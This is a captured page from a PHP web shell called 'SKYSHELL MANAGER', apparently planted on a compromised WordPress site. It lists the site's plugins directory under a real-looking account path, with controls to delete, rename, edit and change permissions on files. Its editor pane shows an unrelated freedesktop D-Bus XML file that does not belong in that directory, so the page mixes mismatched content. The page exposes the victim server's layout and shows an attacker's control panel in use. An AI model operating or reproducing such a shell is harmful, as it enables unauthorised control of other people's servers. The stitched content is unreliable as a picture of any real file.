📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
redlightsquared.com
/
wp-content
/
plugins
/
Name
Size
Perm
Actions
📁
adminify
-
0755
🗑️
🏷️
🔒
📁
adminify-activity-logs
-
0755
🗑️
🏷️
🔒
📁
adminify-pro
-
0755
🗑️
🏷️
🔒
📁
akismet
-
0755
🗑️
🏷️
🔒
📁
all-in-one-wp-migration
-
0755
🗑️
🏷️
🔒
📁
all-in-one-wp-migration-unlimited-extension
-
0755
🗑️
🏷️
🔒
📁
authorizenet-payment-gateway-for-woocommerce
-
0755
🗑️
🏷️
🔒
📁
backuply
-
0755
🗑️
🏷️
🔒
📁
backuply-pro
-
0755
🗑️
🏷️
🔒
📁
cf7-conditional-fields
-
0755
🗑️
🏷️
🔒
📁
classic-editor
-
0755
🗑️
🏷️
🔒
📁
code-snippets
-
0755
🗑️
🏷️
🔒
📁
contact-form-7
-
0755
🗑️
🏷️
🔒
📁
cookieadmin
-
0755
🗑️
🏷️
🔒
📁
cookieadmin-pro
-
0755
🗑️
🏷️
🔒
📁
crisp
-
0755
🗑️
🏷️
🔒
📁
duplicate-page
-
0755
🗑️
🏷️
🔒
📁
duplicator
-
0755
🗑️
🏷️
🔒
📁
export-media-with-selected-content
-
0755
🗑️
🏷️
🔒
📁
google-listings-and-ads
-
0755
🗑️
🏷️
🔒
📁
google-site-kit
-
0755
🗑️
🏷️
🔒
📁
gosmtp
-
0755
🗑️
🏷️
🔒
📁
gosmtp-pro
-
0755
🗑️
🏷️
🔒
📁
header-footer
-
0755
🗑️
🏷️
🔒
📁
litespeed-cache
-
0755
🗑️
🏷️
🔒
📁
loginizer
-
0755
🗑️
🏷️
🔒
📁
loginizer-security
-
0755
🗑️
🏷️
🔒
📁
loginpress
-
0755
🗑️
🏷️
🔒
📁
masterslider
-
0755
🗑️
🏷️
🔒
📁
oxygen
-
0755
🗑️
🏷️
🔒
📁
oxygen-gutenberg
-
0755
🗑️
🏷️
🔒
📁
oxygen-woocommerce
-
0755
🗑️
🏷️
🔒
📁
pagelayer
-
0755
🗑️
🏷️
🔒
📁
pagelayer-pro
-
0755
🗑️
🏷️
🔒
📁
pdf-embedder
-
0755
🗑️
🏷️
🔒
📁
rolemaster-suite
-
0755
🗑️
🏷️
🔒
📁
siteseo
-
0755
🗑️
🏷️
🔒
📁
siteseo-pro
-
0755
🗑️
🏷️
🔒
📁
speedycache
-
0755
🗑️
🏷️
🔒
📁
speedycache-pro
-
0755
🗑️
🏷️
🔒
📁
wc-external-product-new-tab
-
0755
🗑️
🏷️
🔒
📁
woocommerce
-
0755
🗑️
🏷️
🔒
📁
wordpress-seo
-
0755
🗑️
🏷️
🔒
📁
wp-headers-and-footers
-
0755
🗑️
🏷️
🔒
📄
error_log
2935.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
login.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: org.freedesktop.impl.portal.Background.xml
<?xml version="1.0"?> <!-- Copyright (C) 2019 Red Hat, Inc This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library. If not, see <http://www.gnu.org/licenses/>. Author: Matthias Clasen <mclasen@redhat.com> --> <node name="/" xmlns:doc="http://www.freedesktop.org/dbus/1.0/doc.dtd"> <!-- org.freedesktop.impl.portal.Background: @short_description: Background portal backend interface This interface provides APIs related to applications that are running in the background. --> <interface name="org.freedesktop.impl.portal.Background"> <!-- GetAppState: @apps: an array with information about running apps Gets information about running apps. Each entry has an application ID as key. The returned values are of type u and have the following meaning: <simplelist> <member>0: Background (no open window)</member> <member>1: Running (at least one open window)</member> <member>2: Active (in the foreground)</member> </simplelist> --> <method name='GetAppState'> <arg type="a{sv}" name="apps" direction="out"/> </method> <!-- NotifyBackground: @handle: Object path for the #org.freedesktop.impl.portal.Request object representing this call @app_id: App id of the application @name: A display name for the application @response: Numeric response, not used @results: Vardict with results of the call Notifies the user that an application is running in the background. The following results get returned via the @results vardict: <variablelist> <varlistentry> <term>result u</term> <listitem><para> The choice that the user made regarding the background activity: <simplelist> <member>0: Forbid background activity by this app</member> <member>1: Allow background activity by this app</member> <member>2: Allow this instance of background activity</member> </simplelist> </para></listitem> </varlistentry> </variablelist> --> <method name='NotifyBackground'> <arg type="o" name="handle" direction="in"/> <arg type="s" name="app_id" direction="in"/> <arg type="s" name="name" direction="in"/> <arg type="u" name="response" direction="out"/> <arg type="a{sv}" name="results" direction="out"/> </method> <!-- EnableAutostart: @app_id: App id of the application @enable: TRUE to enable autostart, FALSE to disable it @commandline: The commandline to use in the autostart file @flags: Flags influencing the details of the autostarting @result: TRUE if autostart was enabled, FALSE otherwise Enables or disables autostart for an application. The following flags are understood: <simplelist> <member>1: Use D-Bus activation</member> </simplelist> --> <method name='EnableAutostart'> <arg type="s" name="app_id" direction="in"/> <arg type="b" name="enable" direction="in"/> <arg type="as" name="commandline" direction="in"/> <arg type="u" name="flags" direction="in"/> <arg type="b" name="result" direction="out"/> </method> <!-- RunningApplicationsChanged: This signal gets emitted when applications change their state and it is worth calling GetAppState again. --> <signal name='RunningApplicationsChanged'> </signal> </interface> </node>
Save